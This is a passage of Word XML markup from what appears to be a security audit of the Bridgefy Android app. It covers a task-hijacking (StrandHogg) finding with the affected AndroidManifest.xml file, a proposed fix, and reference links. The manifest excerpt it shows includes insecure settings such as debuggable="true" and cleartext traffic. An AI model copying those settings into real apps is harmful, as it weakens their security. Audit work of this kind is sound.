      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FLAG_ACTIVITY_NEW_TASK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should not be set in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>launch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>intents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If deemed required, one should use the aforementioned in combination with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FLAG_ACTIVITY_CLEAR_TASK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/AndroidManifest.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@style/Theme.BridgefyApp"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@string/app_launcher_name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:icon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@mipmap/ic_launcher" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.App" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:debuggable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:allowBackup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:logo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@drawable/ic_bridgefy" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:hardwareAccelerated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:supportsRtl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:fullBackupContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:usesCleartextTraffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="185"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487599104">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>281552</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="37" name="Graphic 37"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="37" name="Graphic 37"/>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22.169458pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15717376;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape28" coordorigin="1440,443" coordsize="2880,0" path="m1440,443l4320,443e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="48"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.xda-developers.com/strandhogg-2-0-android-vulnerability-explained.../</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="49"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId73">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId74">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.slideshare.net/phdays/android-task-hijacking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:appComponentFactory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"androidx.core.app.CoreComponentFactory"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="6424" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>android:taskAffinity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt; [...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>activity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"@style/Theme.BridgefyApp.Splash" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"me.bridgefy.main.ux.startup.StartupActivity"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>android:launchMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"singleInstance"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:exported</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1313" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>intent-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1808" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>action </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.intent.action.VIEW" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1808" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
